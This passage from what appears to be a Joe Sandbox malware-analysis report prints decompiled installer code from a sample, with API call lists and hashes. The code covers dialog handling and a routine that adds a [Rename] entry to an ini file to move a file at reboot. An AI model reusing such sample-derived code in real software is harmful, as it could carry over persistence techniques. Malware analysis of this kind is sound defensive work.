				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                    0x0040503e
                    0x00405057
                    0x0040505c
                    0x00405064
                    0x0040506a
                    0x00405080
                    0x00405083
                    0x004052ae
                    0x004052b5
                    0x004052c9
                    0x004052b7
                    0x004052b9
                    0x004052bc
                    0x004052bd
                    0x004052c4
                    0x004052c4
                    0x004052d5
                    0x004052e3
                    0x004052e6
                    0x004052fc
                    0x00405371
                    0x00405374
                    0x00405376
                    0x00405380
                    0x0040538e
                    0x0040538e
                    0x00405390
                    0x0040539a
                    0x004053a0
                    0x004053a3
                    0x004053a6
                    0x004053c1
                    0x004053a8
                    0x004053b2
                    0x004053b2
                    0x004053a6
                    0x0040539a
                    0x00000000
                    0x00405374
                    0x00405301
                    0x0040530c
                    0x00405311
                    0x00405318
                    0x0040531d
                    0x00405321
                    0x0040532c
                    0x0040532c
                    0x00405330
                    0x00405334
                    0x00405338
                    0x0040534b
                    0x0040533a
                    0x0040533a
                    0x00405341
                    0x00405347
                    0x00405343
                    0x00405343
                    0x00405343
                    0x00405341
                    0x0040534f
                    0x00405351
                    0x00405364
                    0x00405367
                    0x0040536a
                    0x0040536a
                    0x00405334
                    0x00000000
                    0x00405321
                    0x00405303
                    0x0040530a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004053c4
                    0x004053c4
                    0x004053cb
                    0x0040543c
                    0x00405444
                    0x0040544c
                    0x0040544c
                    0x00405455
                    0x00405457
                    0x0040545e
                    0x00405461
                    0x00405461
                    0x00405467
                    0x0040546e
                    0x00405471
                    0x00405471
                    0x00405477
                    0x0040547d
                    0x00405483
                    0x00405483
                    0x00405490
                    0x004055f1
                    0x004055f8
                    0x00405615
                    0x0040561b
                    0x0040562d
                    0x0040562d
                    0x00000000
                    0x00405496
                    0x00405498
                    0x0040549d
                    0x004054a2
                    0x004054a7
                    0x004054a9
                    0x004054a9
                    0x004054aa
                    0x004054ab
                    0x004054ad
                    0x004054ad
                    0x004054b5
                    0x004054f6
                    0x004054f8
                    0x00405508
                    0x0040550b
                    0x00405510
                    0x00405517
                    0x0040551a
                    0x004055bc
                    0x004055c5
                    0x004055cd
                    0x004055cd
                    0x004055db
                    0x004055ec
                    0x004055ec
                    0x00000000
                    0x004055db
                    0x00405520
                    0x00405523
                    0x00405529
                    0x0040552e
                    0x00405530
                    0x00405532
                    0x00405538
                    0x0040553f
                    0x00405544
                    0x0040554b
                    0x0040554e
                    0x0040554e
                    0x00405555
                    0x00405561
                    0x00405565
                    0x00405567
                    0x00405567
                    0x00405557
                    0x00405559
                    0x00405559
                    0x00405587
                    0x00405593
                    0x004055a2
                    0x004055a2
                    0x004055a4
                    0x004055a7
                    0x004055b0
                    0x00000000
                    0x004054b7
                    0x004054c2
                    0x004054c5
                    0x004054ca
                    0x004054cc
                    0x004054d0
                    0x004054e0
                    0x004054ea
                    0x004054ec
                    0x004054ef
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004054d2
                    0x004054d2
                    0x004054d8
                    0x004054da
                    0x004054da
                    0x004054db
                    0x004054dc
                    0x00000000
                    0x004054d2
                    0x004054b5
                    0x00405490
                    0x004053d3
                    0x00000000
                    0x004053e9
                    0x004053f3
                    0x004053f8
                    0x00000000
                    0x00000000
                    0x0040540a
                    0x0040540f
                    0x0040541b
                    0x0040541b
                    0x0040541d
                    0x0040542c
                    0x0040542e
                    0x00405432
                    0x00405435
                    0x00000000
                    0x00405435
                    0x004053d3
                    0x00405089
                    0x0040508e
                    0x00405097
                    0x0040509e
                    0x004050b0
                    0x004050bb
                    0x004050c1
                    0x004050cf
                    0x004050e3
                    0x004050e8
                    0x004050f5
                    0x004050fa
                    0x00405110
                    0x00405121
                    0x0040512e
                    0x0040512e
                    0x00405131
                    0x00405137
                    0x00405139
                    0x0040513c
                    0x00405141
                    0x00405146
                    0x00405148
                    0x00405148
                    0x00405168
                    0x00405168
                    0x0040516a
                    0x0040516b
                    0x00405170
                    0x00405176
                    0x0040517a
                    0x0040517f
                    0x00405187
                    0x0040518b
                    0x00405190
                    0x00405195
                    0x0040519d
                    0x004051a0
                    0x00405270
                    0x00405283
                    0x00000000
                    0x004051a6
                    0x004051a9
                    0x004051ac
                    0x004051af
                    0x004051af
                    0x004051b5
                    0x004051be
                    0x004051c1
                    0x004051c5
                    0x004051c8
                    0x004051cb
                    0x004051d4
                    0x004051dd
                    0x004051e0
                    0x004051e3
                    0x004051e6
                    0x00405224
                    0x0040524f
                    0x00405226
                    0x00405235
                    0x00405235
                    0x004051e8
                    0x004051eb
                    0x004051f9
                    0x00405203
                    0x0040520b
                    0x00405212
                    0x0040521d
                    0x0040521d
                    0x004051e6
                    0x00405255
                    0x00405256
                    0x00405262
                    0x00405262
                    0x0040526e
                    0x00405289
                    0x0040528c
                    0x004052a9
                    0x00000000
                    0x0040528e
                    0x00405293
                    0x0040529c
                    0x0040562f
                    0x00405641
                    0x00405641
                    0x0040528c
                    0x00000000
                    0x0040526e
                    0x004051a0

                    APIs
                    • GetDlgItem.USER32 ref: 0040504F
                    • GetDlgItem.USER32 ref: 0040505A
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                    • LoadImageW.USER32 ref: 004050BB
                    • SetWindowLongW.USER32 ref: 004050D4
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                    • DeleteObject.GDI32(00000000), ref: 00405131
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                      • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                    • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                    • SetWindowLongW.USER32 ref: 00405283
                    • ShowWindow.USER32(?,00000005), ref: 00405293
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                    • ImageList_Destroy.COMCTL32(?), ref: 00405461
                    • GlobalFree.KERNEL32 ref: 00405471
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                    • ShowWindow.USER32(?,00000000), ref: 0040561B
                    • GetDlgItem.USER32 ref: 00405626
                    • ShowWindow.USER32(00000000), ref: 0040562D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 2564846305-813528018
                    • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                    • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                    • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                    • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}


















                    0x0040479b
                    0x004048c8
                    0x00404925
                    0x00404929
                    0x004049f6
                    0x004049f8
                    0x004049f8
                    0x004049fe
                    0x004049fe
                    0x00404a01
                    0x00000000
                    0x00404a08
                    0x00404937
                    0x0040493d
                    0x00404947
                    0x00404952
                    0x00404955
                    0x00404958
                    0x00404963
                    0x00404966
                    0x0040496d
                    0x0040497a
                    0x0040498b
                    0x00404991
                    0x00404993
                    0x00404999
                    0x004049a7
                    0x004049ad
                    0x004049ad
                    0x0040496d
                    0x004049b7
                    0x00000000
                    0x004049c2
                    0x004049c6
                    0x004049d6
                    0x004049d6
                    0x004049dc
                    0x004049e8
                    0x004049e8
                    0x00000000
                    0x004049ec
                    0x004049b7
                    0x004048d3
                    0x00000000
                    0x004048e5
                    0x004048ea
                    0x004048f0
                    0x00000000
                    0x00000000
                    0x00404919
                    0x0040491b
                    0x00404920
                    0x00000000
                    0x00404920
                    0x004048d3
                    0x004047a1
                    0x004047a4
                    0x004047a9
                    0x004047ba
                    0x004047ba
                    0x004047c2
                    0x004047c5
                    0x004047c9
                    0x004047cc
                    0x004047d0
                    0x004047d3
                    0x004047d6
                    0x004047d9
                    0x004047e0
                    0x004047e2
                    0x004047e2
                    0x004047ec
                    0x004047f9
                    0x00404803
                    0x00404808
                    0x0040480b
                    0x00404810
                    0x00404827
                    0x0040482e
                    0x00404841
                    0x00404844
                    0x00404858
                    0x0040485f
                    0x00404864
                    0x00404869
                    0x00404869
                    0x00404877
                    0x00404885
                    0x00404897
                    0x0040489c
                    0x004048ac
                    0x004048ae
                    0x00000000

                    APIs
                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                    • GetDlgItem.USER32 ref: 0040483B
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                    • GetSysColor.USER32(?), ref: 00404869
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                    • lstrlenW.KERNEL32(?), ref: 0040488A
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                    • GetDlgItem.USER32 ref: 00404905
                    • SendMessageW.USER32(00000000), ref: 0040490C
                    • GetDlgItem.USER32 ref: 00404937
                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
                    • SetCursor.USER32(00000000), ref: 0040498B
                    • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
                    • SetCursor.USER32(00000000), ref: 004049A7
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                    • String ID: @jz$N
                    • API String ID: 3103080414-4087404676
                    • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                    • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                    • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                    • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
